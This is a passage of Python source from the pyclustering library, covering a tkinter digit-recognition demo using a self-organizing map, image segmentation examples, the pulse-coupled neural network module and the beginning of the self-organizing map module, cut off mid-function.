from pyclustering.utils import read_image, rgb2gray;
from tkinter import *;
from tkinter import messagebox;
import math;
import pickle;
import os;
import random;
class recognizer:
__network = None;
def __init__(self):
self.__decode_map = [];
for index_digit in range(0, 10, 1):
list_file_digit_sample = IMAGE_DIGIT_SAMPLES.GET_LIST_IMAGE_SAMPLES(index_digit);
for file_name in list_file_digit_sample:
self.__decode_map.append(index_digit);
def train(self):
samples = [];
print("Digit images preprocessing...");
for index_digit in range(0, 10, 1):
list_file_digit_sample = IMAGE_DIGIT_SAMPLES.GET_LIST_IMAGE_SAMPLES(index_digit);
for file_name in list_file_digit_sample:
data = read_image(file_name);
image_pattern = rgb2gray(data);
for index_pixel in range(len(image_pattern)):
if (image_pattern[index_pixel] < 128):
image_pattern[index_pixel] = 1;
else:
image_pattern[index_pixel] = 0;
samples += [ image_pattern ];
print("SOM initialization...");
self.__network = som(2, 5, type_conn.grid_four, None, True);
print("SOM training...");
self.__network.train(samples, 300);
print("SOM is ready...");
def recognize(self, input_pattern):
index_neuron = self.__network.simulate(input_pattern);
decoded_capture_objects = [];
for index_capture_object in self.__network.capture_objects[index_neuron]:
# print("\t%s" % decode_map[index_capture_object]);
decoded_capture_objects.append(self.__decode_map[index_capture_object]);
frequent_index = max(set(decoded_capture_objects), key = decoded_capture_objects.count);
print(decoded_capture_objects);
return frequent_index;
def save_knowledge(self):
result_saving = False;
if (self.__network is not None):
file_network_dump = open("knowledge_recognition_memory_dump", "wb");
pickle.dump(self.__network, file_network_dump);
result_saving = True;
return result_saving;
def load_knowledge(self):
result_loading = False;
if (os.path.isfile("knowledge_recognition_memory_dump") is True):
file_network_dump = open("knowledge_recognition_memory_dump", "rb");
self.__network = pickle.load(file_network_dump);
result_loading = True;
return result_loading;
class digit_application:
__color = "#000000";
__widget = None;
__user_pattern = None;
__recognizer = None;
__master = None;
def __init__(self):
self.__master = Tk();
self.__master.title("Recognition");
self.__widget = Canvas(self.__master, width = 320, height = 320);
self.__widget.pack(expand = YES, fill = BOTH);
self.__widget.bind("<B1-Motion>", self.__paint);
button_recognize = Button(self.__master, text = "Recognize", command = self.click_recognize, width = 25);
button_recognize.pack(side = BOTTOM);
button_recognize = Button(self.__master, text = "Random Image", command = self.click_image_load, width = 25);
button_recognize.pack(side = BOTTOM);
# button_save = Button(self.__master, text = "Save", command = self.click_save, width = 25);
# button_save.pack(side = BOTTOM);
#
# button_load = Button(self.__master, text = "Load", command = self.click_load, width = 25);
# button_load.pack(side = BOTTOM);
button_train = Button(self.__master, text = "Train", command = self.click_train, width = 25);
button_train.pack(side = BOTTOM);
button_clean = Button(self.__master, text = "Clean", command = self.click_clean, width = 25);
button_clean.pack(side = BOTTOM);
self.__user_pattern = [ 0 for i in range(32 * 32) ];
self.__recognizer = recognizer();
def __paint(self, event):
# calculate square that is belong this click
if ( (event.x >= 0) and (event.x < 320) and (event.y >= 0) and (event.y < 320) ):
x1, y1 = math.floor(event.x / 10), math.floor(event.y / 10);
self.__user_pattern[y1 * 32 + x1] = 1;
index2 = (y1 + 1) * 32 + x1;
index3 = y1 * 32 + (x1 + 1);
index4 = (y1 + 1) * 32 + (x1 + 1);
if (index2 < len(self.__user_pattern)):
self.__user_pattern[index2] = 1;
if (index3 < len(self.__user_pattern)):
self.__user_pattern[index3] = 1;
if (index4 < len(self.__user_pattern)):
self.__user_pattern[index4] = 1;
display_x1, display_y1 = x1 * 10, y1 * 10;
display_x2, display_y2 = display_x1 + 20, display_y1 + 20;
self.__widget.create_rectangle(display_x1, display_y1, display_x2, display_y2, fill = self.__color, width = 0);
def click_train(self):
self.__recognizer.train();
def click_load(self):
if (self.__recognizer.load_knowledge() is not True):
messagebox.showwarning("Recognition - Knowledge Loading", "Knowledge represented by self-organized feature map has not been "
"load from hardware to recognizer due to lack of saved dump of that object. "
"Please save knowledge dump after training and after that it will be possible "
"to use load it at any time.");
def click_save(self):
if (self.__recognizer.save_knowledge() is not True):
messagebox.showwarning("Recognition - Knowledge Saving", "Knowledge represented by self-organized feature map has been created "
"because training has been performed. Please train recognizer and after save result of training.");
def click_recognize(self):
digit_index = self.__recognizer.recognize(self.__user_pattern);
messagebox.showinfo("Recognition - Result", "Most probably input digit is " + str(digit_index));
def click_clean(self):
self.__user_pattern = [ 0 for i in range(32 * 32) ];
Canvas.delete(self.__widget, "all");
def click_image_load(self):
self.__user_pattern = [ 0 for i in range(32 * 32) ];
Canvas.delete(self.__widget, "all");
index_digit = int(math.floor(random.random() * 10));
list_file_digit_sample = IMAGE_DIGIT_SAMPLES.GET_LIST_IMAGE_SAMPLES(index_digit);
index_image = int(math.floor( random.random() * len(list_file_digit_sample) ));
file_name = list_file_digit_sample[index_image];
data = read_image(file_name);
image_pattern = rgb2gray(data);
for y in range(32):
for x in range(32):
linear_index = y * 32 + x;
if (image_pattern[linear_index] < 128):
self.__user_pattern[linear_index] = 1;
self.__widget.create_rectangle(x * 10, y * 10, x * 10 + 10, y * 10 + 10, fill = self.__color, width = 0);
def start(self):
mainloop();
app = digit_application();
app.start();
# digit_recognition();
```
#### File: nnet/examples/syncsegm_examples.py
```python
from pyclustering.samples.definitions import IMAGE_SIMPLE_SAMPLES, IMAGE_MAP_SAMPLES
from pyclustering.nnet.syncsegm import syncsegm, syncsegm_visualizer
from pyclustering.utils import draw_image_mask_segments
def template_segmentation_image(source, color_radius, object_radius, noise_size, show_dyn):
algorithm = syncsegm(color_radius, object_radius, noise_size, False)
analyser = algorithm.process(source, show_dyn)
color_segments = analyser.allocate_colors(0.01, noise_size)
draw_image_mask_segments(source, color_segments)
if object_radius is not None:
object_segments = analyser.allocate_objects(0.01, noise_size)
draw_image_mask_segments(source, object_segments)
if show_dyn is True:
syncsegm_visualizer.show_first_layer_dynamic(analyser)
syncsegm_visualizer.show_second_layer_dynamic(analyser)
def segmentation_image_simple1():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE01, 128, None, 10, show_dyn = False)
def segmentation_image_simple2():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE02, 128, None, 10, show_dyn = False)
def segmentation_image_simple3():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE03, 128, None, 10, show_dyn = False)
def segmentation_image_simple4():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE04, 128, None, 10, show_dyn = False)
def segmentation_image_simple5():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE05, 128, 4, 10, show_dyn = False)
def segmentation_image_simple6():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE06, 128, 4, 10, show_dyn = True)
def segmentation_image_simple7():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE07, 128, 5, 10, show_dyn = False)
def segmentation_image_simple8():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE08, 128, 5, 10, show_dyn = False)
def segmentation_image_simple9():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE09, 128, 4, 10, show_dyn = False)
def segmentation_image_simple10():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE10, 128, 5, 10, show_dyn = False)
def segmentation_image_beach():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BEACH, 128, None, 10, show_dyn = False)
def segmentation_image_building():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BUILDING, 16, 10, 10, show_dyn = False)
def segmentation_image_fruits_small():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_FRUITS_SMALL, 16, 4, 20, show_dyn = False)
def segmentation_image_white_sea():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_WHITE_SEA, 16, None, 50, show_dyn = False)
def segmentation_image_white_sea_small():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_WHITE_SEA_SMALL, 20, None, 50, show_dyn = False)
def segmentation_image_nile():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_NILE, 16, None, 50, show_dyn = False)
def segmentation_image_nile_small():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_NILE_SMALL, 50, None, 50, show_dyn = False)
segmentation_image_simple1()
segmentation_image_simple2()
segmentation_image_simple3()
segmentation_image_simple4()
segmentation_image_simple5()
segmentation_image_simple6()
segmentation_image_simple7()
segmentation_image_simple8()
segmentation_image_simple9()
segmentation_image_simple10()
segmentation_image_beach()
segmentation_image_building()
segmentation_image_fruits_small()
segmentation_image_white_sea()
segmentation_image_white_sea_small()
segmentation_image_nile()
segmentation_image_nile_small()
```
#### File: pyclustering/nnet/pcnn.py
```python
import random
import numpy
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from PIL import Image
from pyclustering.nnet import *
from pyclustering.core.wrapper import ccore_library
import pyclustering.core.pcnn_wrapper as wrapper
from pyclustering.utils import draw_dynamics
class pcnn_parameters:
"""!
@brief Parameters for pulse coupled neural network.
"""
def __init__(self):
"""!
@brief Default constructor of parameters for pulse-coupled neural network.
@details Constructor initializes parameters by default non-zero values that can be
used for simple simulation.
"""
## Multiplier for the feeding compartment at the current step.
self.VF = 1.0
## Multiplier for the linking compartment at the current step.
self.VL = 1.0
## Multiplier for the threshold at the current step.
self.VT = 10.0
## Multiplier for the feeding compartment at the previous step.
self.AF = 0.1
## Multiplier for the linking compartment at the previous step.
self.AL = 0.1
## Multiplier for the threshold at the previous step.
self.AT = 0.5
## Synaptic weight - neighbours influence on linking compartment.
self.W = 1.0
## Synaptic weight - neighbours influence on feeding compartment.
self.M = 1.0
## Linking strength in the network.
self.B = 0.1
## Enable/disable Fast-Linking mode. Fast linking helps to overcome some of the effects of time quantisation. This process allows the linking wave to progress a lot faster than the feeding wave.
self.FAST_LINKING = False
class pcnn_dynamic:
"""!
@brief Represents output dynamic of PCNN (pulse-coupled neural network).
"""
@property
def output(self):
"""!
@brief (list) Returns oscillato outputs during simulation.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_get_output(self.__ccore_pcnn_dynamic_pointer)
return self.__dynamic
@property
def time(self):
"""!
@brief (list) Returns sampling times when dynamic is measured during simulation.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_get_time(self.__ccore_pcnn_dynamic_pointer)
return list(range(len(self)))
def __init__(self, dynamic, ccore=None):
"""!
@brief Constructor of PCNN dynamic.
@param[in] dynamic (list): Dynamic of oscillators on each step of simulation. If ccore pointer is specified than it can be ignored.
@param[in] ccore (ctypes.pointer): Pointer to CCORE pcnn_dynamic instance in memory.
"""
self.__OUTPUT_TRUE = 1 # fire value for oscillators.
self.__OUTPUT_FALSE = 0 # rest value for oscillators.
self.__dynamic = dynamic
self.__ccore_pcnn_dynamic_pointer = ccore
def __del__(self):
"""!
@brief Default destructor of PCNN dynamic.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
wrapper.pcnn_dynamic_destroy(self.__ccore_pcnn_dynamic_pointer)
def __len__(self):
"""!
@brief (uint) Returns number of simulation steps that are stored in dynamic.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_get_size(self.__ccore_pcnn_dynamic_pointer)
return len(self.__dynamic)
def allocate_sync_ensembles(self):
"""!
@brief Allocate clusters in line with ensembles of synchronous oscillators where each
synchronous ensemble corresponds to only one cluster.
@return (list) Grours (lists) of indexes of synchronous oscillators.
For example, [ [index_osc1, index_osc3], [index_osc2], [index_osc4, index_osc5] ].
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_allocate_sync_ensembles(self.__ccore_pcnn_dynamic_pointer)
sync_ensembles = []
traverse_oscillators = set()
number_oscillators = len(self.__dynamic[0])
for t in range(len(self.__dynamic) - 1, 0, -1):
sync_ensemble = []
for i in range(number_oscillators):
if self.__dynamic[t][i] == self.__OUTPUT_TRUE:
if i not in traverse_oscillators:
sync_ensemble.append(i)
traverse_oscillators.add(i)
if sync_ensemble != []:
sync_ensembles.append(sync_ensemble)
return sync_ensembles
def allocate_spike_ensembles(self):
"""!
@brief Analyses output dynamic of network and allocates spikes on each iteration as a list of indexes of oscillators.
@details Each allocated spike ensemble represents list of indexes of oscillators whose output is active.
@return (list) Spike ensembles of oscillators.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_allocate_spike_ensembles(self.__ccore_pcnn_dynamic_pointer)
spike_ensembles = []
number_oscillators = len(self.__dynamic[0])
for t in range(len(self.__dynamic)):
spike_ensemble = []
for index in range(number_oscillators):
if self.__dynamic[t][index] == self.__OUTPUT_TRUE:
spike_ensemble.append(index)
if len(spike_ensemble) > 0:
spike_ensembles.append(spike_ensemble)
return spike_ensembles
def allocate_time_signal(self):
"""!
@brief Analyses output dynamic and calculates time signal (signal vector information) of network output.
@return (list) Time signal of network output.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_allocate_time_signal(self.__ccore_pcnn_dynamic_pointer)
signal_vector_information = []
for t in range(0, len(self.__dynamic)):
signal_vector_information.append(sum(self.__dynamic[t]))
return signal_vector_information
class pcnn_visualizer:
"""!
@brief Visualizer of output dynamic of pulse-coupled neural network (PCNN).
"""
@staticmethod
def show_time_signal(pcnn_output_dynamic):
"""!
@brief Shows time signal (signal vector information) using network dynamic during simulation.
@param[in] pcnn_output_dynamic (pcnn_dynamic): Output dynamic of the pulse-coupled neural network.
"""
time_signal = pcnn_output_dynamic.allocate_time_signal()
time_axis = range(len(time_signal))
plt.subplot(1, 1, 1)
plt.plot(time_axis, time_signal, '-')
plt.ylabel("G (time signal)")
plt.xlabel("t (iteration)")
plt.grid(True)
plt.show()
@staticmethod
def show_output_dynamic(pcnn_output_dynamic, separate_representation = False):
"""!
@brief Shows output dynamic (output of each oscillator) during simulation.
@param[in] pcnn_output_dynamic (pcnn_dynamic): Output dynamic of the pulse-coupled neural network.
@param[in] separate_representation (list): Consists of lists of oscillators where each such list consists of oscillator indexes that will be shown on separated stage.
"""
figure, _ = draw_dynamics(pcnn_output_dynamic.time, pcnn_output_dynamic.output, x_title="t", y_title="y(t)", separate=separate_representation)
plt.close(figure)
@staticmethod
def animate_spike_ensembles(pcnn_output_dynamic, image_size):
"""!
@brief Shows animation of output dynamic (output of each oscillator) during simulation.
@param[in] pcnn_output_dynamic (pcnn_dynamic): Output dynamic of the pulse-coupled neural network.
@param[in] image_size (tuple): Image size represented as (height, width).
"""
figure = plt.figure()
time_signal = pcnn_output_dynamic.allocate_time_signal()
spike_ensembles = pcnn_output_dynamic.allocate_spike_ensembles()
spike_animation = []
ensemble_index = 0
for t in range(len(time_signal)):
image_color_segments = [(255, 255, 255)] * (image_size[0] * image_size[1])
if time_signal[t] > 0:
for index_pixel in spike_ensembles[ensemble_index]:
image_color_segments[index_pixel] = (0, 0, 0)
ensemble_index += 1
stage = numpy.array(image_color_segments, numpy.uint8)
stage = numpy.reshape(stage, image_size + ((3),)) # ((3),) it's size of RGB - third dimension.
image_cluster = Image.fromarray(stage, 'RGB')
spike_animation.append( [ plt.imshow(image_cluster, interpolation='none') ] )
im_ani = animation.ArtistAnimation(figure, spike_animation, interval=75, repeat_delay=3000, blit=True)
plt.show()
plt.close(figure)
class pcnn_network(network):
"""!
@brief Model of oscillatory network that is based on the Eckhorn model.
@details CCORE option can be used to use the pyclustering core - C/C++ shared library for processing that significantly increases performance.
Here is an example how to perform PCNN simulation:
@code
from pyclustering.nnet.pcnn import pcnn_network, pcnn_visualizer
# Create Pulse-Coupled neural network with 10 oscillators.
net = pcnn_network(10)
# Perform simulation during 100 steps using binary external stimulus.
dynamic = net.simulate(50, [1, 1, 1, 0, 0, 0, 0, 1, 1, 1])
# Allocate synchronous ensembles from the output dynamic.
ensembles = dynamic.allocate_sync_ensembles()
# Show output dynamic.
pcnn_visualizer.show_output_dynamic(dynamic, ensembles)
@endcode
"""
__OUTPUT_TRUE = 1 # fire value for oscillators.
__OUTPUT_FALSE = 0 # rest value for oscillators.
def __init__(self, num_osc, parameters=None, type_conn=conn_type.ALL_TO_ALL, type_conn_represent=conn_represent.MATRIX, height=None, width=None, ccore=True):
"""!
@brief Constructor of oscillatory network is based on Kuramoto model.
@param[in] num_osc (uint): Number of oscillators in the network.
@param[in] parameters (pcnn_parameters): Parameters of the network.
@param[in] type_conn (conn_type): Type of connection between oscillators in the network (all-to-all, grid, bidirectional list, etc.).
@param[in] type_conn_represent (conn_represent): Internal representation of connection in the network: matrix or list.
@param[in] height (uint): Number of oscillators in column of the network, this argument is used
only for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored.
@param[in] width (uint): Number of oscillotors in row of the network, this argument is used only
for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored.
@param[in] ccore (bool): If True then all interaction with object will be performed via CCORE library (C++ implementation of pyclustering).
"""
self._outputs = None # list of outputs of oscillators.
self._feeding = None # feeding compartment of each oscillator.
self._linking = None # linking compartment of each oscillator.
self._threshold = None # threshold of each oscillator.
self._params = None
self.__ccore_pcnn_pointer = None
# set parameters of the network
if parameters is not None:
self._params = parameters
else:
self._params = pcnn_parameters()
if (ccore is True) and ccore_library.workable():
network_height = height
network_width = width
if (type_conn == conn_type.GRID_FOUR) or (type_conn == conn_type.GRID_EIGHT):
if (network_height is None) or (network_width is None):
side_size = num_osc ** (0.5)
if side_size - math.floor(side_size) > 0:
raise NameError('Invalid number of oscillators in the network in case of grid structure')
network_height = int(side_size)
network_width = int(side_size)
else:
network_height = 0
network_width = 0
self.__ccore_pcnn_pointer = wrapper.pcnn_create(num_osc, type_conn, network_height, network_width, self._params)
else:
super().__init__(num_osc, type_conn, type_conn_represent, height, width)
self._outputs = [0.0] * self._num_osc
self._feeding = [0.0] * self._num_osc
self._linking = [0.0] * self._num_osc
self._threshold = [ random.random() for i in range(self._num_osc) ]
def __del__(self):
"""!
@brief Default destructor of PCNN.
"""
if self.__ccore_pcnn_pointer is not None:
wrapper.pcnn_destroy(self.__ccore_pcnn_pointer)
self.__ccore_pcnn_pointer = None
def __len__(self):
"""!
@brief (uint) Returns size of oscillatory network.
"""
if self.__ccore_pcnn_pointer is not None:
return wrapper.pcnn_get_size(self.__ccore_pcnn_pointer)
return self._num_osc
def simulate(self, steps, stimulus):
"""!
@brief Performs static simulation of pulse coupled neural network using.
@param[in] steps (uint): Number steps of simulations during simulation.
@param[in] stimulus (list): Stimulus for oscillators, number of stimulus should be equal to number of oscillators.
@return (pcnn_dynamic) Dynamic of oscillatory network - output of each oscillator on each step of simulation.
"""
if len(stimulus) != len(self):
raise NameError('Number of stimulus should be equal to number of oscillators. Each stimulus corresponds to only one oscillators.')
if self.__ccore_pcnn_pointer is not None:
ccore_instance_dynamic = wrapper.pcnn_simulate(self.__ccore_pcnn_pointer, steps, stimulus)
return pcnn_dynamic(None, ccore_instance_dynamic)
dynamic = []
dynamic.append(self._outputs)
for step in range(1, steps, 1):
self._outputs = self._calculate_states(stimulus)
dynamic.append(self._outputs)
return pcnn_dynamic(dynamic)
def _calculate_states(self, stimulus):
"""!
@brief Calculates states of oscillators in the network for current step and stored them except outputs of oscillators.
@param[in] stimulus (list): Stimulus for oscillators, number of stimulus should be equal to number of oscillators.
@return (list) New outputs for oscillators (do not stored it).
"""
feeding = [0.0] * self._num_osc
linking = [0.0] * self._num_osc
outputs = [0.0] * self._num_osc
threshold = [0.0] * self._num_osc
for index in range(0, self._num_osc, 1):
neighbors = self.get_neighbors(index)
feeding_influence = 0.0
linking_influence = 0.0
for index_neighbour in neighbors:
feeding_influence += self._outputs[index_neighbour] * self._params.M
linking_influence += self._outputs[index_neighbour] * self._params.W
feeding_influence *= self._params.VF
linking_influence *= self._params.VL
feeding[index] = self._params.AF * self._feeding[index] + stimulus[index] + feeding_influence
linking[index] = self._params.AL * self._linking[index] + linking_influence
# calculate internal activity
internal_activity = feeding[index] * (1.0 + self._params.B * linking[index])
# calculate output of the oscillator
if internal_activity > self._threshold[index]:
outputs[index] = self.__OUTPUT_TRUE
else:
outputs[index] = self.__OUTPUT_FALSE
# In case of Fast Linking we should calculate threshold until output is changed.
if self._params.FAST_LINKING is not True:
threshold[index] = self._params.AT * self._threshold[index] + self._params.VT * outputs[index]
# In case of Fast Linking we need to wait until output is changed.
if self._params.FAST_LINKING is True:
output_change = True # Set it True for the for the first iteration.
previous_outputs = outputs[:]
while output_change is True:
current_output_change = False
for index in range(0, self._num_osc, 1):
linking_influence = 0.0
neighbors = self.get_neighbors(index)
for index_neighbour in neighbors:
linking_influence += previous_outputs[index_neighbour] * self._params.W
linking_influence *= self._params.VL
linking[index] = linking_influence
internal_activity = feeding[index] * (1.0 + self._params.B * linking[index])
# calculate output of the oscillator
if internal_activity > self._threshold[index]:
outputs[index] = self.__OUTPUT_TRUE
else:
outputs[index] = self.__OUTPUT_FALSE
current_output_change |= (outputs[index] != previous_outputs[index])
output_change = current_output_change
if output_change is True:
previous_outputs = outputs[:]
# In case of Fast Linking threshold should be calculated after fast linking.
if self._params.FAST_LINKING is True:
for index in range(0, self._num_osc, 1):
threshold[index] = self._params.AT * self._threshold[index] + self._params.VT * outputs[index]
self._feeding = feeding[:]
self._linking = linking[:]
self._threshold = threshold[:]
return outputs
```
#### File: pyclustering/nnet/som.py
```python
import math
import random
import matplotlib.pyplot as plt
import pyclustering.core.som_wrapper as wrapper
from pyclustering.core.wrapper import ccore_library
from pyclustering.utils import euclidean_distance_square
from pyclustering.utils.dimension import dimension_info
from enum import IntEnum
class type_conn(IntEnum):
"""!
@brief Enumeration of connection types for SOM.
@see som
"""
## Grid type of connections when each oscillator has connections with left, upper, right, lower neighbors.
grid_four = 0
## Grid type of connections when each oscillator has connections with left, upper-left, upper, upper-right, right, right-lower, lower, lower-left neighbors.
grid_eight = 1
## Grid type of connections when each oscillator has connections with left, upper-left, upper-right, right, right-lower, lower-left neighbors.
honeycomb = 2
## Grid type of connections when existance of each connection is defined by the SOM rule on each step of simulation.
func_neighbor = 3
class type_init(IntEnum):
"""!
@brief Enumeration of initialization types for SOM.
@see som
"""
## Weights are randomly distributed using Gaussian distribution (0, 1).
random = 0
## Weights are randomly distributed using Gaussian distribution (input data centroid, 1).
random_centroid = 1
## Weights are randomly distrbiuted using Gaussian distribution (input data centroid, surface of input data).
random_surface = 2
## Weights are distributed as a uniform grid that covers whole surface of the input data.
uniform_grid = 3
class som_parameters:
"""!
@brief Represents SOM parameters.
"""
def __init__(self):
"""!
@brief Creates SOM parameters.
"""
## Defines an initialization way for neuron weights (random, random in center of the input data, random distributed in data, ditributed in line with uniform grid).
self.init_type = type_init.uniform_grid
## Initial radius. If the initial radius is not specified (equals to `None`) then it will be calculated by SOM.
self.init_radius = None
## Rate of learning.
self.init_learn_rate = 0.1
## Condition that defines when the learining process should be stopped. It is used when the autostop mode is on.
self.adaptation_threshold = 0.001
## Seed for random state (by default is `None`, current system time is used).
self.random_state = None
class som:
"""!
@brief Represents self-organized feature map (SOM).
@details The self-organizing feature map (SOM) method is a powerful tool for the visualization of
of high-dimensional data. It converts complex, nonlinear statistical relationships between
high-dimensional data into simple geometric relationships on a low-dimensional display.
@details `ccore` option can be specified in order to control using C++ implementation of pyclustering library. By
default C++ implementation is on. C++ implementation improves performance of the self-organized feature
map.
Example:
@code
import random
from pyclustering.utils import read_sample
from pyclustering.nnet.som import som, type_conn, type_init, som_parameters
from pyclustering.samples.definitions import FCPS_SAMPLES
# read sample 'Lsun' from file
sample = read_sample(FCPS_SAMPLES.SAMPLE_LSUN)
# create SOM parameters
parameters = som_parameters()
# create self-organized feature map with size 7x7
rows = 10 # five rows
cols = 10 # five columns
structure = type_conn.grid_four; # each neuron has max. four neighbors.
network = som(rows, cols, structure, parameters)
# train network on 'Lsun' sample during 100 epouchs.
network.train(sample, 100)
# simulate trained network using randomly modified point from input dataset.
index_point = random.randint(0, len(sample) - 1)
point = sample[index_point] # obtain randomly point from data
point[0] += random.random() * 0.2 # change randomly X-coordinate
point[1] += random.random() * 0.2 # change randomly Y-coordinate
index_winner = network.simulate(point)
# check what are objects from input data are much close to randomly modified.
index_similar_objects = network.capture_objects[index_winner]
# neuron contains information of encoded objects
print("Point '%s' is similar to objects with indexes '%s'." % (str(point), str(index_similar_objects)))
print("Coordinates of similar objects:")
for index in index_similar_objects: print("\tPoint:", sample[index])
# result visualization:
# show distance matrix (U-matrix).
network.show_distance_matrix()
# show density matrix (P-matrix).
network.show_density_matrix()
# show winner matrix.
network.show_winner_matrix()
# show self-organized map.
network.show_network()
@endcode
There is a visualization of 'Target' sample that was done by the self-organized feature map:
@image html target_som_processing.png
"""
@property
def size(self):
"""!
@brief Return size of self-organized map that is defined by total number of neurons.
@return (uint) Size of self-organized map (number of neurons).
"""
if self.__ccore_som_pointer is not None:
self._size = wrapper.som_get_size(self.__ccore_som_pointer)
return self._size
@property
def weights(self):
"""!
@brief Return weight of each neuron.
@return (list) Weights of each neuron.
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
return self._weights
@property
def awards(self):
"""!
@brief Return amount of captured objects by each neuron after training.
@return (list) Amount of captured objects by each neuron.
@see train()
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
return self._award
@property
def capture_objects(self):
"""!
@brief Returns indexes of captured objects by each neuron.
@details For example, a network with size 2x2 has been trained on a sample with five objects. Suppose neuron #1
won an object with index `1`, neuron #2 won objects `0`, `3`, `4`, neuron #3 did not won anything and
finally neuron #4 won an object with index `2`. Thus, for this example we will have the following
output `[[1], [0, 3, 4], [], [2]]`.
@return (list) Indexes of captured objects by each neuron.
"""
if self.__ccore_som_pointer is not None:
self._capture_objects = wrapper.som_get_capture_objects(self.__ccore_som_pointer)
return self._capture_objects
def __init__(self, rows, cols, conn_type=type_conn.grid_eight, parameters=None, ccore=True):
"""!
@brief Constructor of self-organized map.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@param[in] conn_type (type_conn): Type of connection between oscillators in the network (grid four, grid eight, honeycomb, function neighbour).
@param[in] parameters (som_parameters): Other specific parameters.
@param[in] ccore (bool): If True simulation is performed by CCORE library (C++ implementation of pyclustering).
"""
# some of these parameters are required despite core implementation, for example, for network visualization.
self._cols = cols
self._rows = rows
self._size = cols * rows
self._conn_type = conn_type
self._data = None
self._neighbors = None
self._local_radius = 0.0
self._learn_rate = 0.0
self.__ccore_som_pointer = None
self._params = parameters or som_parameters()
if self._params.init_radius is None:
self._params.init_radius = self.__initialize_initial_radius(rows, cols)
if (ccore is True) and ccore_library.workable():
self.__ccore_som_pointer = wrapper.som_create(rows, cols, conn_type, self._params)
else:
# location
self._location = self.__initialize_locations(rows, cols)
# default weights
self._weights = [[0.0]] * self._size
# awards
self._award = [0] * self._size
# captured objects
self._capture_objects = [[] for i in range(self._size)]
# distances - calculate and store them only during training
self._sqrt_distances = None
# connections
if conn_type != type_conn.func_neighbor:
self._create_connections(conn_type)
def __del__(self):
"""!
@brief Destructor of the self-organized feature map.
"""
if self.__ccore_som_pointer is not None:
wrapper.som_destroy(self.__ccore_som_pointer)
def __len__(self):
"""!
@brief Returns size of the network that defines by amount of neuron in it.
@return (uint) Size of self-organized map (amount of neurons).
"""
return self._size
def __getstate__(self):
"""
@brief Returns state of SOM network that can be used to store network.
"""
if self.__ccore_som_pointer is not None:
self.__download_dump_from_ccore()
return self.__get_dump_from_python(True)
return self.__get_dump_from_python(False)
def __setstate__(self, som_state):
"""
@brief Set state of SOM network that can be used to load network.
"""
if som_state['ccore'] is True and ccore_library.workable():
self.__upload_dump_to_ccore(som_state['state'])
else:
self.__upload_dump_to_python(som_state['state'])
def __initialize_initial_radius(self, rows, cols):
"""!
@brief Initialize initial radius using map sizes.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@return (list) Value of initial radius.
"""
if (cols + rows) / 4.0 > 1.0:
return 2.0
elif (cols > 1) and (rows > 1):
return 1.5
else:
return 1.0
def __initialize_locations(self, rows, cols):
"""!
@brief Initialize locations (coordinates in SOM grid) of each neurons in the map.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@return (list) List of coordinates of each neuron in map.
"""
location = list()
for i in range(rows):
for j in range(cols):
location.append([float(i), float(j)])
return location
def __initialize_distances(self, size, location):
"""!
@brief Initialize distance matrix in SOM grid.
@param[in] size (uint): Amount of neurons in the network.
@param[in] location (list): List of coordinates of each neuron in the network.
@return (list) Distance matrix between neurons in the network.
"""
sqrt_distances = [[[] for i in range(size)] for j in range(size)]
for i in range(size):
for j in range(i, size, 1):
dist = euclidean_distance_square(location[i], location[j])
sqrt_distances[i][j] = dist
sqrt_distances[j][i] = dist
return sqrt_distances
def _create_initial_weights(self, init_type):
"""!
@brief Creates initial weights for neurons in line with the specified initialization.
@param[in] init_type (type_init): Type of initialization of initial neuron weights (random, random in center of the input data, random distributed in data, ditributed in line with uniform grid).
"""
dim_info = dimension_info(self._data)
step_x = dim_info.get_center()[0]
if self._rows > 1:
step_x = dim_info.get_width()[0] / (self._rows - 1)
step_y = 0.0
if dim_info.get_dimensions() > 1:
step_y = dim_info.get_center()[1]
if self._cols > 1:
step_y = dim_info.get_width()[1] / (self._cols - 1)
# generate weights (topological coordinates)
random.seed(self._params.random_state)
# Uniform grid.
if init_type == type_init.uniform_grid:
# Predefined weights in line with input data.
